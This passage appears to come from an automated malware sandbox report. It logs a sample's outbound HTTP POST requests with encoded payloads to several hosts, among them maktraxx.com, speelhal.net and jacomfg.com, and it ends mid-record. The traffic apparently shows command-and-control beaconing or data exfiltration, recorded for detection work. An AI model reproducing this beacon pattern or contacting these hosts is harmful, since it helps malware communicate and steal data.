S3hfW0lwfmVXsrFXmL24u2KHGtdnQ5jAjW9p4q5KfJYIDpA6bU5AZ360B7QSbfR3it4wzMuKtI5NIf5CZVe16lpipnKqFVN43vVJkq5D/AL1AEea9Rmd+FCZQSnb25VvJREUE6sE4gvaU9piJ6S/GK7RgDDLRjv98RuxL3/ZOpT+kY+6TrwRjspN1rVIQyXnqFCaUJh9TDQ453sVrx8l3vK43Z+FZq1c7lPJcwYhi5Acp/jIcnbShwNGIXWfAgIAVtmX2fSK780iCT/1pNp0TzV+TJlmVx3pqDrQnaFH18HeHjC1K1A858+uBc6lG6On62bSYiNi5NL1+rX/+Kdg1Oj+D1BGM/m11FG6jbWG//p+s1giPxLG2PM7mkv43y3HA0O58rdO2/bQ5s+gI4oarH80KZwTmRTP4YhxBZmLdGC1vtbmYYm4GEggEM2OYN3VCSonYMhsvSiBQ0vL/5NMeuPTlW2zy/O2X/8PxFyNu5U1AHa1vUHZ59YbStVmgMfTu4ngVMrFgQiwQt7XgZEhKmaF5ixI/CWs
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.maktraxx.comCache-Control: no-cacheData Raw: 30 34 6f 4e 58 2b 65 4f 66 6d 56 75 77 7a 30 7a 6c 6a 39 62 78 62 43 42 76 38 5a 64 51 65 70 2b 43 78 48 4a 42 4a 41 6c 79 2f 31 48 74 35 50 54 7a 76 32 53 30 63 74 4f 50 43 6b 54 59 49 73 59 44 6c 6e 49 6d 39 53 47 63 34 30 47 4c 53 54 55 6c 42 2b 41 62 45 62 45 71 51 4f 2b 5a 6d 6b 65 74 77 4f 6a 4d 79 52 67 75 61 34 59 42 48 59 6f 4c 6a 6c 4b 65 7a 61 71 73 78 48 76 35 6d 76 7a 45 67 45 6a 50 79 61 6b 4a 6d 64 75 48 68 6b 4d 63 4d 69 38 58 6f 34 6c 4c 55 4a 32 71 6e 39 64 70 73 59 79 4e 6f 43 6f 74 6d 66 6d 77 4c 79 70 57 34 38 75 6d 4e 4d 77 68 73 67 6c 49 34 7a 51 4f 51 42 46 57 7a 78 59 34 33 6b 2f 52 45 4d 6f 41 6e 52 2b 61 6e 4c 71 45 74 49 66 6e 72 37 5a 44 45 66 42 32 6c 36 55 46 65 68 43 2f 4b 55 4e 6c 7a 59 55 71 46 61 35 31 74 45 64 45 69 67 6d 42 58 32 72 41 2b 4c 75 58 45 39 43 55 47 56 69 71 34 36 65 36 2b 65 42 71 64 46 75 4c 4d 65 4d 32 72 77 64 7a 65 69 39 39 59 64 47 6f 7a 6c 75 30 4a 4d 44 6a 6f 5a 30 67 6f 7a 4e 6d 66 78 52 30 43 71 62 4d 51 4a 54 66 4d 2f 68 46 39 5a 38 41 46 2b 4d 76 47 66 65 73 67 74 4a 65 70 39 56 58 43 66 41 67 42 47 75 4f 47 6b 50 66 76 51 62 37 62 55 74 73 36 77 54 52 64 74 35 36 76 66 77 77 45 4e 75 46 4d 66 6b 34 6c 54 38 74 62 65 68 56 65 57 55 4e 50 6d 6d 6e 55 53 64 74 76 59 32 6d 71 46 73 30 71 46 58 77 64 61 52 52 62 77 4b 76 48 52 79 61 6c 56 71 4b 6c 6d 69 64 66 4a 4e 6a 45 66 50 6b 4b 62 75 32 53 62 43 50 52 49 7a 6f 79 77 38 52 30 55 55 46 78 55 70 63 44 5a 37 58 47 66 5a 53 6d 65 56 6e 51 66 62 69 53 51 62 66 39 6e 70 44 46 42 50 44 64 65 77 4c 37 75 61 48 4f 53 6d 71 32 69 75 53 44 6e 52 56 6c 77 4d 50 45 2b 54 64 4c 65 48 4c 66 65 36 6a 78 39 32 4f 6c 4b 54 54 76 59 75 4c 76 67 33 58 6c 53 42 76 50 6e 74 2f 2b 61 74 48 36 44 6e 4a 58 38 66 75 63 47 64 59 32 33 5a 57 47 39 78 75 52 39 66 Data Ascii: 04oNX+eOfmVuwz0zlj9bxbCBv8ZdQep+CxHJBJAly/1Ht5PTzv2S0ctOPCkTYIsYDlnIm9SGc40GLSTUlB+AbEbEqQO+ZmketwOjMyRgua4YBHYoLjlKezaqsxHv5mvzEgEjPyakJmduHhkMcMi8Xo4lLUJ2qn9dpsYyNoCotmfmwLypW48umNMwhsglI4zQOQBFWzxY43k/REMoAnR+anLqEtIfnr7ZDEfB2l6UFehC/KUNlzYUqFa51tEdEigmBX2rA+LuXE9CUGViq46e6+eBqdFuLMeM2rwdzei99YdGozlu0JMDjoZ0gozNmfxR0CqbMQJTfM/hF9Z8AF+MvGfesgtJep9VXCfAgBGuOGkPfvQb7bUts6wTRdt56vfwwENuFMfk4lT8tbehVeWUNPmmnUSdtvY2mqFs0qFXwdaRRbwKvHRyalVqKlmidfJNjEfPkKbu2SbCPRIzoyw8R0UUFxUpcDZ7XGfZSmeVnQfbiSQbf9npDFBPDdewL7uaHOSmq2iuSDnRVlwMPE+TdLeHLfe6jx92OlKTTvYuLvg3XlSBvPnt/+atH6DnJX8fucGdY23ZWG9xuR9f
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.speelhal.netCache-Control: no-cacheData Raw: 32 7a 42 34 31 7a 6a 49 69 6d 57 50 71 78 64 30 75 32 36 35 50 53 74 30 49 67 53 41 78 31 32 33 37 4f 61 33 41 77 62 70 44 72 33 61 64 45 66 75 4e 5a 50 64 68 2f 69 4c 37 38 76 4c 6c 35 6c 6a 33 41 5a 64 31 65 73 39 73 66 58 31 57 79 6a 49 52 2b 4d 59 43 4e 7a 34 4e 61 46 2f 63 31 51 49 66 46 4c 41 49 77 4a 52 56 73 45 59 31 73 57 6d 64 7a 64 6a 4b 35 51 41 37 39 2f 45 37 32 6f 63 51 71 62 6f 64 42 30 74 52 52 4a 50 79 63 79 4a 78 64 50 59 2b 51 79 53 52 70 73 6c 2f 6a 6b 4c 46 4d 5a 46 34 41 36 70 74 6d 30 50 70 73 79 46 38 43 52 5a 42 2f 74 38 37 47 70 5a 4d 4a 79 2f 4b 57 32 30 6c 4e 79 6f 32 5a 75 37 75 39 4d 62 65 70 66 4e 6a 57 5a 70 45 36 56 6e 4e 6d 45 78 6c 35 31 36 46 51 43 69 7a 32 65 44 54 65 73 6b 58 69 39 5a 76 59 41 7a 7a 31 63 34 4c 5a 32 63 70 58 31 44 4c 62 2f 61 50 6f 59 6b 6f 37 62 70 41 4d 38 38 34 43 47 33 78 6b 71 64 51 77 73 77 4a 68 44 59 32 4e 59 75 33 34 41 38 49 4c 5a 5a 42 76 4f 6f 36 50 4d 43 6e 73 37 42 57 4d 79 44 6f 4a 71 31 52 49 72 2b 73 6c 62 2b 76 4a 6d 73 2f 58 6f 42 39 33 7a 50 6d 30 75 63 4f 32 37 56 53 72 46 4e 52 6c 49 66 73 4b 47 71 4e 49 5a 4b 39 31 44 5a 32 2f 45 77 53 4e 53 4c 51 43 36 4f 54 68 49 51 66 69 53 6e 74 42 4f 69 7a 78 69 49 6f 69 56 79 4e 75 45 6d 6c 42 34 2f 43 77 4d 42 2f 5a 74 68 51 37 43 52 75 4b 6c 44 55 34 4d 55 2b 56 46 6e 57 43 78 4b 4a 46 45 31 6f 74 72 79 37 69 54 58 73 71 65 63 43 75 65 54 47 63 79 59 51 58 66 7a 4e 34 38 2b 37 4c 67 34 41 56 64 71 59 6a 78 69 59 34 45 75 2f 33 46 33 39 71 2f 6f 6b 71 68 6d 41 46 5a 47 35 6a 61 33 69 6d 63 6f 6a 6e 2b 44 64 39 63 6e 49 66 67 4e 54 43 56 76 44 71 68 49 32 61 78 4b 41 7a 44 77 63 4c 6b 51 4d 59 67 44 6a 46 62 39 55 47 44 61 6e 44 62 52 44 4a 78 39 57 54 57 46 32 2f 53 6c 64 2f 36 32 79 66 54 61 32 41 3d 3d Data Ascii: 2zB41zjIimWPqxd0u265PSt0IgSAx1237Oa3AwbpDr3adEfuNZPdh/iL78vLl5lj3AZd1es9sfX1WyjIR+MYCNz4NaF/c1QIfFLAIwJRVsEY1sWmdzdjK5QA79/E72ocQqbodB0tRRJPycyJxdPY+QySRpsl/jkLFMZF4A6ptm0PpsyF8CRZB/t87GpZMJy/KW20lNyo2Zu7u9MbepfNjWZpE6VnNmExl516FQCiz2eDTeskXi9ZvYAzz1c4LZ2cpX1DLb/aPoYko7bpAM884CG3xkqdQwswJhDY2NYu34A8ILZZBvOo6PMCns7BWMyDoJq1RIr+slb+vJms/XoB93zPm0ucO27VSrFNRlIfsKGqNIZK91DZ2/EwSNSLQC6OThIQfiSntBOizxiIoiVyNuEmlB4/CwMB/ZthQ7CRuKlDU4MU+VFnWCxKJFE1otry7iTXsqecCueTGcyYQXfzN48+7Lg4AVdqYjxiY4Eu/3F39q/okqhmAFZG5ja3imcojn+Dd9cnIfgNTCVvDqhI2axKAzDwcLkQMYgDjFb9UGDanDbRDJx9WTWF2/Sld/62yfTa2A==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jacomfg.comCache-Control: no-cacheData Raw: 4d 37 76 75 4a 54 34 45 68 57 58 77 54 34 63 52 43 64 37 75 7a 53 45 38 4e 70 6e 2b 73 68 43 79 55 67 68 79 59 57 30 4e 75 35 2f 69 48 43 38 45 58 54 38 71 41 75 4e 54 6d 48 6d 64 2b 5a 54 35 74 47 53 72 52 33 53 62 6c 6b 47 74 78 43 72 74 4d 72 39 2b 49 4b 32 62 35 6d 4d 55 4e 62 45 35 4c 45 76 2b 70 69 48 67 4b 49 4e 33 42 37 47 31 47 37 31 43 72 68 70 34 5a 4f 64 44 4b 4c 59 4a 42 4e 4c 31 78 59 67 65 50 6f 70 38 30 53 6f 4b 32 33 2f 6a 73 48 71 6e 4c 5a 48 44 59 4f 79 74 63 42 70 67 4a 6a 51 74 30 59 53 44 69 61 4d 61 4e 79 35 5a 50 49 67 31 41 4c 54 43 57 6b 58 44 6e 6d 6d 43 37 45 52 59 72 74 6b 56 6e 70 5a 36 61 65 41 39 4c 61 6c 71 47 79 65 4a 6a 44 69 51 58 50 33 49 55 7a 35 4c 6a 61 72 50 30 6a 64 67 56 31 57 49 56 64 76 39 36 66 54 79 62 59 43 44 6f 55 34 75 66 4f 41 32 44 42 72 42 41 30 6d 5a 33 7a 38 79 6b 2f 58 53 4e 78 66 76 57 43 39 50 53 78 58 6a 75 4b 52 45 48 59 56 2f 38 73 6f 58 68 75 69 69 54 76 38 56 65 43 58 43 72 50 61 4d 30 4a 7a 33 68 4b 63 55 33 63 39 47 55 42 2b 54 54 45 48 2b 78 51 53 4c 58 49 6d 51 48 31 49 6f 57 51 72 41 77 7a 68 73 63 55 66 2f 54 54 38 4f 6d 4c 79 71 5a 49 78 51 6a 52 6d 6a 78 4e 74 6e 35 48 58 6f 4c 77 76 79 47 6c 41 74 6d 47 79 41 68 55 74 70 43 4e 67 53 30 75 55 71 57 73 41 44 41 69 76 7a 74 32 7a 41 31 36 2b 36 73 6f 4a 5a 56 70 6c 44 66 61 33 58 67 66 36 71 58 2b 55 53 4f 46 76 32 46 46 6a 6f 66 6e 30 4b 72 50 43 4a 4b 58 67 44 36 51 7a 44 50 6f 67 63 73 59 56 6c 2f 6f 71 6f 77 74 39 52 46 4c 49 75 6a 71 74 31 49 65 4b 46 35 77 31 77 2f 67 73 66 41 75 71 64 53 57 37 6c 2f 6c 6b 6a 31 4c 44 48 74 78 49 6a 4d 38 61 75 32 77 34 41 66 72 62 71 48 65 53 70 79 6f 74 76 66 46 69 6f 79 2b 69 74 53 4d 7a 73 43 67 63 50 6d 43 62 55 4a 67 3d 3d Data Ascii: M7vuJT4EhWXwT4cRCd7uzSE8Npn+shCyUghyYW0Nu5/iHC8EXT8qAuNTmHmd+ZT5tGSrR3SblkGtxCrtMr9+IK2b5mMUNbE5LEv+piHgKIN3B7G1G71Crhp4ZOdDKLYJBNL1xYgePop80SoK23/jsHqnLZHDYOytcBpgJjQt0YSDiaMaNy5ZPIg1ALTCWkXDnmmC7ERYrtkVnpZ6aeA9LalqGyeJjDiQXP3IUz5LjarP0jdgV1WIVdv96fTybYCDoU4ufOA2DBrBA0mZ3z8yk/XSNxfvWC9PSxXjuKREHYV/8soXhuiiTv8VeCXCrPaM0Jz3hKcU3c9GUB+TTEH+xQSLXImQH1IoWQrAwzhscUf/TT8OmLyqZIxQjRmjxNtn5HXoLwvyGlAtmGyAhUtpCNgS0uUqWsADAivzt2zA16+6soJZVplDfa3Xgf6qX+USOFv2FFjofn0KrPCJKXgD6QzDPogcsYVl/oqowt9RFLIujqt1IeKF5w1w/gsfAuqdSW7l/lkj1LDHtxIjM8au2w4AfrbqHeSpyotvfFioy+itSMzsCgcPmCbUJg==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 70 4f 62 77 59 72 30 4f 62 6d 58 78 77 53 51 68 64 41 42 61 72 66 62 4e 6d 2f 37 72 68 46 4f 4f 51 5a 50 78 43 57 6c 66 6d 46 39 70 56 2b 45 5a 44 44 59 4e 6e 46 31 4d 7a 6c 67 78 59 39 2b 75 4b 6b 39 57 50 75 69 43 41 71 2f 44 41 6f 48 41 32 43 54 49 50 64 4c 32 30 4f 70 5a 44 59 55 39 68 4a 6a 46 71 79 31 41 67 45 57 47 54 6a 44 6e 52 55 37 59 51 66 43 45 4a 56 66 63 4a 31 51 6c 32 72 63 33 39 65 53 6c 55 42 31 6a 38 6d 35 2f 53 2f 45 47 6d 31 34 41 7a 2b 77 35 6f 71 56 62 50 70 50 75 4f 31 74 54 5a 66 6e 42 66 54 43 34 33 74 63 69 43 2b 4e 4b 37 34 2b 4c 77 61 54 62 46 56 6a 2b 44 46 70 48 76 61 39 71 71 58 69 58 4e 44 42 4b 2b 75 72 59 76 30 38 6a 2f 66 4d 6d 4f 42 70 75 76 57 4e 49 52 47 78 38 71 45 34 39 41 38 69 4e 58 48 74 73 5a 4f 74 55 5a 65 55 76 69 72 62 31 38 75 5a 65 32 39 50 63 55 51 45 2b 32 64 58 67 47 6a 69 36 34 76 2f 47 31 37 45 44 4f 6e 4f 6a 39 77 57 65 2f 44 77 72 79 6f 4c 34 41 72 73 34 34 55 68 61 6d 6b 78 45 77 4f 4f 47 75 7a 50 6f 79 75 69 71 50 6a 49 58 4f 59 2f 4b 4e 46 65 77 4a 36 5a 36 6a 4e 68 65 57 37 34 67 34 63 6d 79 63 78 4b 6f 4d 33 4c 30 46 6f 54 46 35 35 2f 70 42 2f 65 34 4d 33 74 70 30 36 67 48 53 2b 64 30 4e 5a 61 4f 47 6a 34 72 4f 59 58 50 79 59 59 46 31 51 58 47 42 63 38 36 31 4e 66 65 62 7a 57 56 2f 49 4b 50 64 49 75 6b 6d 64 6b 44 58 6f 31 31 35 67 32 38 6e 2b 47 37 48 56 55 63 76 53 72 52 39 44 45 6c 4b 74 77 51 41 64 70 7a 56 64 4b 45 6f 6e 65 6d 7a 49 59 4a 30 62 56 4c 35 52 76 32 48 47 53 70 2f 54 73 72 6b 43 49 36 71 30 43 4d 54 49 6e 48 37 37 67 77 65 68 57 51 42 59 4e 6d 65 38 79 69 50 52 67 48 30 55 77 59 38 69 72 66 79 4c 34 33 45 7a 6a 70 34 59 62 4a 56 79 63 38 42 46 59 70 74 57 58 57 32 41 39 4a 54 30 61 32 6c 41 30 38 33 43 44 7a 72 56 34 74 77 61 4c 6f 66 77 3d 3d Data Ascii: pObwYr0ObmXxwSQhdABarfbNm/7rhFOOQZPxCWlfmF9pV+EZDDYNnF1MzlgxY9+uKk9WPuiCAq/DAoHA2CTIPdL20OpZDYU9hJjFqy1AgEWGTjDnRU7YQfCEJVfcJ1Ql2rc39eSlUB1j8m5/S/EGm14Az+w5oqVbPpPuO1tTZfnBfTC43tciC+NK74+LwaTbFVj+DFpHva9qqXiXNDBK+urYv08j/fMmOBpuvWNIRGx8qE49A8iNXHtsZOtUZeUvirb18uZe29PcUQE+2dXgGji64v/G17EDOnOj9wWe/DwryoL4Ars44UhamkxEwOOGuzPoyuiqPjIXOY/KNFewJ6Z6jNheW74g4cmycxKoM3L0FoTF55/pB/e4M3tp06gHS+d0NZaOGj4rOYXPyYYF1QXGBc861NfebzWV/IKPdIukmdkDXo115g28n+G7HVUcvSrR9DElKtwQAdpzVdKEonemzIYJ0bVL5Rv2HGSp/TsrkCI6q0CMTInH77gwehWQBYNme8yiPRgH0UwY8irfyL43Ezjp4YbJVyc8BFYptWXW2A9JT0a2lA083CDzrV4twaLofw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.netcr.comCache-Control: no-cacheData Raw: 53 33 68 66 57 30 6c 77 66 6d 56 58 73 72 46 58 6d 4c 32 34 75 32 4b 48 47 74 64 6e 51 35 6a 41 6a 57 39 70 34 71 35 4b 66 4a 59 49 44 70 41 36 62 55 35 41 5a 33 36 30 42 37 51 53 62 66 52 33 69 74 34 77 7a 4d 75 4b 74 49 35 4e 49 66 35 43 5a 56 65 31 36 6c 70 69 70 6e 4b 71 46 56 4e 34 33 76 56 4a 6b 71 35 44 2f 41 4c 31 41 45 65 61 39 52 6d 64 2b 46 43 5a 51 53 6e 62 32 35 56 76 4a 52 45 55 45 36 73 45 34 67 76 61 55 39 70 69 4a 36 53 2f 47 4b 37 52 67 44 44 4c 52 6a 76 39 38 52 75 78 4c 33 2f 5a 4f 70 54 2b 6b 59 2b 36 54 72 77 52 6a 73 70 4e 31 72 56 49 51 79 58 6e 71 46 43 61 55 4a 68 39 54 44 51 34 35 33 73 56 72 78 38 6c 33 76 4b 34 33 5a 2b 46 5a 71 31 63 37 6c 50 4a 63 77 59 68 69 35 41 63 70 2f 6a 49 63 6e 62 53 68 77 4e 47 49 58 57 66 41 67 49 41 56 74 6d 58 32 66 53 4b 37 38 30 69 43 54 2f 31 70 4e 70 30 54 7a 56 2b 54 4a 6c 6d 56 78 33 70 71 44 72 51 6e 61 46 48 31 38 48 65 48 6a 43 31 4b 31 41 38 35 38 2b 75 42 63 36 6c 47 36 4f 6e 36 32 62 53 59 69 4e 69 35 4e 4c 31 2b 72 58 2f 2b 4b 64 67 31 4f 6a 2b 44 31 42 47 4d 2f 6d 31 31 46 47 36 6a 62 57 47 2f 2f 70 2b 73 31 67 69 50 78 4c 47 32 50 4d 37 6d 6b 76 34 33 79 33 48 41 30 4f 35 38 72 64 4f 32 2f 62 51 35 73 2b 67 49 34 6f 61 72 48 38 30 4b 5a 77 54 6d 52 54 50 34 59 68 78 42 5a 6d 4c 64 47 43 31 76 74 62 6d 59 59 6d 34 47 45 67 67 45 4d 32 4f 59 4e 33 56 43 53 6f 6e 59 4d 68 73 76 53 69 42 51 30 76 4c 2f 35 4e 4d 65 75 50 54 6c 57 32 7a 79 2f 4f 32 58 2f 38 50 78 46 79 4e 75 35 55 31 41 48 61 31 76 55 48 5a 35 39 59 62 53 74 56 6d 67 4d 66 54 75 34 6e 67 56 4d 72 46 67 51 69 77 51 74 37 58 67 5a 45 68 4b 6d 61 46 35 69 78 49 2f 43 57 73 Data Ascii: S3hfW0lwfmVXsrFXmL24u2KHGtdnQ5jAjW9p4q5KfJYIDpA6bU5AZ360B7QSbfR3it4wzMuKtI5NIf5CZVe16lpipnKqFVN43vVJkq5D/AL1AEea9Rmd+FCZQSnb25VvJREUE6sE4gvaU9piJ6S/GK7RgDDLRjv98RuxL3/ZOpT+kY+6TrwRjspN1rVIQyXnqFCaUJh9TDQ453sVrx8l3vK43Z+FZq1c7lPJcwYhi5Acp/jIcnbShwNGIXWfAgIAVtmX2fSK780iCT/1pNp0TzV+TJlmVx3pqDrQnaFH18HeHjC1K1A858+uBc6lG6On62bSYiNi5NL1+rX/+Kdg1Oj+D1BGM/m11FG6jbWG//p+s1giPxLG2PM7mkv43y3HA0O58rdO2/bQ5s+gI4oarH80KZwTmRTP4YhxBZmLdGC1vtbmYYm4GEggEM2OYN3VCSonYMhsvSiBQ0vL/5NMeuPTlW2zy/O2X/8PxFyNu5U1AHa1vUHZ59YbStVmgMfTu4ngVMrFgQiwQt7XgZEhKmaF5ixI/CWs
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.findbc.comCache-Control: no-cacheData Raw: 33 67 76 46 46 56 6b 65 6c 57 58 45 48 48 7a 69 61 50 50 4a 78 66 49 76 49 5a 43 33 63 69 68 44 6e 58 62 69 4f 32 2b 69 4f 6f 31 41 78 37 7a 6a 32 64 74 34 70 6d 6e 71 6e 55 4c 4e 73 6e 6a 56 63 35 32 31 46 2f 50 37 4c 79 76 47 46 6a 2b 62 33 71 57 74 75 39 79 38 6a 72 38 36 45 4f 74 72 4c 77 77 52 41 4f 55 55 37 30 6e 61 4d 45 44 6e 49 61 4e 7a 6f 59 51 61 76 6b 5a 58 2b 32 6b 35 46 73 75 49 4b 6a 70 51 68 43 57 69 2b 35 38 6b 6a 74 46 43 66 47 56 61 4b 54 4e 70 36 50 63 6f 5a 77 75 36 56 33 55 59 70 7a 71 51 61 5a 66 33 4c 56 6c 77 69 30 54 69 31 42 73 73 47 4c 38 61 36 7a 41 32 4d 75 33 79 70 57 4b 39 67 4a 56 73 45 4a 62 53 2b 2f 41 4e 54 66 52 31 56 55 54 30 44 2b 31 66 37 41 45 30 6f 33 43 37 33 59 62 68 2f 61 6f 38 7a 66 4a 6b 42 75 33 62 70 52 61 39 69 45 59 76 48 58 75 6d 59 57 4e 6c 47 68 32 36 33 71 38 35 47 47 75 6e 6c 6b 55 6d 2f 30 70 67 64 50 58 2b 74 70 36 63 76 32 2f 64 73 34 52 4a 66 53 50 38 6f 77 69 54 65 53 66 52 73 58 75 50 58 47 6d 2f 75 48 35 62 75 6b 7a 2b 4d 31 33 33 6d 6b 78 42 53 78 32 65 6f 39 61 63 61 67 41 67 44 52 58 49 67 2b 74 36 62 2b 36 6c 6e 4a 39 65 6f 69 32 78 63 50 48 72 52 54 53 69 66 30 6b 50 33 70 67 68 65 64 38 37 30 48 34 63 39 46 45 52 66 2b 32 63 4a 70 65 45 39 78 52 57 33 68 68 47 57 71 7a 36 78 69 52 43 5a 44 64 56 34 38 63 36 6e 72 74 33 49 34 4f 30 37 4b 30 41 6e 39 53 4c 59 6e 59 74 35 51 61 76 63 64 62 58 47 4b 78 4d 4f 34 64 65 69 6e 33 6d 68 41 2b 55 61 68 4e 54 65 41 72 38 76 77 64 77 4f 46 7a 55 59 72 69 31 52 6d 36 6e 58 67 54 4b 4a 63 37 58 61 75 6a 50 45 61 76 2b 59 74 5a 33 74 78 38 42 67 72 66 35 69 4a 4b 4c 74 2b 68 2b 5a 77 6b 52 64 63 46 53 46 47 2f 4d 50 44 38 5a 2f 45 6b 4f 6a 2f 38 3d Data Ascii: 3gvFFVkelWXEHHziaPPJxfIvIZC3cihDnXbiO2+iOo1Ax7zj2dt4pmnqnULNsnjVc521F/P7LyvGFj+b3qWtu9y8jr86EOtrLwwRAOUU70naMEDnIaNzoYQavkZX+2k5FsuIKjpQhCWi+58kjtFCfGVaKTNp6PcoZwu6V3UYpzqQaZf3LVlwi0Ti1BssGL8a6zA2Mu3ypWK9gJVsEJbS+/ANTfR1VUT0D+1f7AE0o3C73Ybh/ao8zfJkBu3bpRa9iEYvHXumYWNlGh263q85GGunlkUm/0pgdPX+tp6cv2/ds4RJfSP8owiTeSfRsXuPXGm/uH5bukz+M133mkxBSx2eo9acagAgDRXIg+t6b+6lnJ9eoi2xcPHrRTSif0kP3pghed870H4c9FERf+2cJpeE9xRW3hhGWqz6xiRCZDdV48c6nrt3I4O07K0An9SLYnYt5QavcdbXGKxMO4dein3mhA+UahNTeAr8vwdwOFzUYri1Rm6nXgTKJc7XaujPEav+YtZ3tx8Bgrf5iJKLt+h+ZwkRdcFSFG/MPD8Z/EkOj/8=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jacomfg.comCache-Control: no-cacheData Raw: 4d 37 76 75 4a 54 34 45 68 57 58 77 54 34 63 52 43 64 37 75 7a 53 45 38 4e 70 6e 2b 73 68 43 79 55 67 68 79 59 57 30 4e 75 35 2f 69 48 43 38 45 58 54 38 71 41 75 4e 54 6d 48 6d 64 2b 5a 54 35 74 47 53 72 52 33 53 62 6c 6b 47 74 78 43 72 74 4d 72 39 2b 49 4b 32 62 35 6d 4d 55 4e 62 45 35 4c 45 76 2b 70 69 48 67 4b 49 4e 33 42 37 47 31 47 37 31 43 72 68 70 34 5a 4f 64 44 4b 4c 59 4a 42 4e 4c 31 78 59 67 65 50 6f 70 38 30 53 6f 4b 32 33 2f 6a 73 48 71 6e 4c 5a 48 44 59 4f 79 74 63 42 70 67 4a 6a 51 74 30 59 53 44 69 61 4d 61 4e 79 35 5a 50 49 67 31 41 4c 54 43 57 6b 58 44 6e 6d 6d 43 37 45 52 59 72 74 6b 56 6e 70 5a 36 61 65 41 39 4c 61 6c 71 47 79 65 4a 6a 44 69 51 58 50 33 49 55 7a 35 4c 6a 61 72 50 30 6a 64 67 56 31 57 49 56 64 76 39 36 66 54 79 62 59 43 44 6f 55 34 75 66 4f 41 32 44 42 72 42 41 30 6d 5a 33 7a 38 79 6b 2f 58 53 4e 78 66 76 57 43 39 50 53 78 58 6a 75 4b 52 45 48 59 56 2f 38 73 6f 58 68 75 69 69 54 76 38 56 65 43 58 43 72 50 61 4d 30 4a 7a 33 68 4b 63 55 33 63 39 47 55 42 2b 54 54 45 48 2b 78 51 53 4c 58 49 6d 51 48 31 49 6f 57 51 72 41 77 7a 68 73 63 55 66 2f 54 54 38 4f 6d 4c 79 71 5a 49 78 51 6a 52 6d 6a 78 4e 74 6e 35 48 58 6f 4c 77 76 79 47 6c 41 74 6d 47 79 41 68 55 74 70 43 4e 67 53 30 75 55 71 57 73 41 44 41 69 76 7a 74 32 7a 41 31 36 2b 36 73 6f 4a 5a 56 70 6c 44 66 61 33 58 67 66 36 71 58 2b 55 53 4f 46 76 32 46 46 6a 6f 66 6e 30 4b 72 50 43 4a 4b 58 67 44 36 51 7a 44 50 6f 67 63 73 59 56 6c 2f 6f 71 6f 77 74 39 52 46 4c 49 75 6a 71 74 31 49 65 4b 46 35 77 31 77 2f 67 73 66 41 75 71 64 53 57 37 6c 2f 6c 6b 6a 31 4c 44 48 74 78 49 6a 4d 38 61 75 32 77 34 41 66 72 62 71 48 65 53 70 79 6f 74 76 66 46 69 6f 79 2b 69 74 53 4d 7a 73 43 67 63 50 6d 43 62 55 4a 67 3d 3d Data Ascii: M7vuJT4EhWXwT4cRCd7uzSE8Npn+shCyUghyYW0Nu5/iHC8EXT8qAuNTmHmd+ZT5tGSrR3SblkGtxCrtMr9+IK2b5mMUNbE5LEv+piHgKIN3B7G1G71Crhp4ZOdDKLYJBNL1xYgePop80SoK23/jsHqnLZHDYOytcBpgJjQt0YSDiaMaNy5ZPIg1ALTCWkXDnmmC7ERYrtkVnpZ6aeA9LalqGyeJjDiQXP3IUz5LjarP0jdgV1WIVdv96fTybYCDoU4ufOA2DBrBA0mZ3z8yk/XSNxfvWC9PSxXjuKREHYV/8soXhuiiTv8VeCXCrPaM0Jz3hKcU3c9GUB+TTEH+xQSLXImQH1IoWQrAwzhscUf/TT8OmLyqZIxQjRmjxNtn5HXoLwvyGlAtmGyAhUtpCNgS0uUqWsADAivzt2zA16+6soJZVplDfa3Xgf6qX+USOFv2FFjofn0KrPCJKXgD6QzDPogcsYVl/oqowt9RFLIujqt1IeKF5w1w/gsfAuqdSW7l/lkj1LDHtxIjM8au2w4AfrbqHeSpyotvfFioy+itSMzsCgcPmCbUJg==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cel-cpa.comCache-Control: no-cacheData Raw: 52 75 78 6a 45 35 49 4b 6c 57 55 6a 53 57 31 70 52 61 68 34 7a 35 57 5a 63 46 54 69 75 5a 65 56 35 71 6e 77 30 54 34 6c 51 65 79 35 6c 52 6f 4e 6d 2f 68 52 55 34 4e 61 69 62 55 34 48 74 7a 35 62 38 54 54 52 67 59 71 68 6f 35 51 48 4e 4a 41 42 78 53 37 79 64 41 41 75 79 6c 55 33 51 70 44 62 51 6b 6e 47 4d 39 57 62 4c 75 44 77 4a 54 34 4d 38 68 78 45 4e 44 44 30 44 67 75 56 44 2b 65 56 7a 44 39 58 79 4d 50 47 54 79 54 75 30 52 2b 30 66 57 2f 35 6c 6e 4f 43 58 68 32 6c 36 4c 35 2b 53 36 79 5a 46 36 51 52 53 57 38 65 34 30 30 73 4a 4e 70 55 32 37 79 62 31 4d 30 54 6d 44 74 49 75 4a 58 43 6d 77 63 5a 67 52 78 39 54 34 41 51 4c 39 72 36 57 74 31 39 4a 77 33 43 46 30 